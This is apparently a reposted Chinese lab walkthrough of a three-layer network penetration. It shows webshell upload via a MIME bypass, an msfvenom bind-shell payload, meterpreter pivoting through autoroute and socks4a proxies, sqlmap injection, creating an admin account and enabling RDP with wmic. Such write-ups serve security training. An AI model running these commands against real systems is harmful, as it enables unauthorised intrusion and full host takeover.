声明:此次渗透环境为实验环境,仅供渗透实验学校参考
前言
【三层网络拓扑图】
【第一层主机】
访问目标ip发现是一个文件上传页面
经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径
访问返回的文件路径,成功连接到php大马
查看ip发现该主机是双网卡,第二层网络段为192.168.1.0/24
为进一步进行内网渗透,我们上传msf后门
后门制作:
将后门上传到第一层主机192.168.31.207
设置msf监听
在第一层主机上运行shell.elf
Chmod 777 shell.elf
./shell.elf
msf获得meterpreter
将第一层的meterpreter切换到后台运行
1.background
【第二层主机】
利用第一层的meterpreter添加第二层的路由
1.run autoroute -s 192.168.1.0/24
1.use auxiliary/server/socks4a
设置好代理后访问192.168.1.100成功访问到网站
在撰写新文章处添加附件可直接上传php脚本
成功连接到php大马
为了打开第三层,我们需要在第二层主机上传msf后门
制作后门:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf
利用大马上传,并在第二层主机上运行
chmod 777 ding.elf
./ding.elf
设置msf相关配置
成功获取到第二层主机meterpreter
查看ip发现第三层网段为192.168.2.0/24
利用第二层主机的meterpreter添加第三层的网络路由
启用一个socks4a代理给第三层网络,端口设置为2334
然后在配置文件中加上
1.socks4 192.168.31.119 2334
利用获得的meterpreter发现第三层目标主机为192.16.2.100
【第三层主机】
使用代理打开Firefox访问第三层主机ip192.168.2.100
通过测试发现http://192.168.2.100/category.php?cat_id=1处存在sql注入
利用proxychains跑一下sqlmap
1.proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"
成功注出后台账号和加密的密码
访问/upload/uploads/webshelldama.php
成功连接到php大马
添加用户账号密码
将添加的用户账号密码添加到管理组
利用大马开启3389端口
1.wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
成功开启3389端口
利用添加的管理员账号密码成功登录到远程桌面
作者:weixin_44991517
原文链接:https://blog.csdn.net/weixin_44991517/article/details/92764972
历史文章推荐:
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论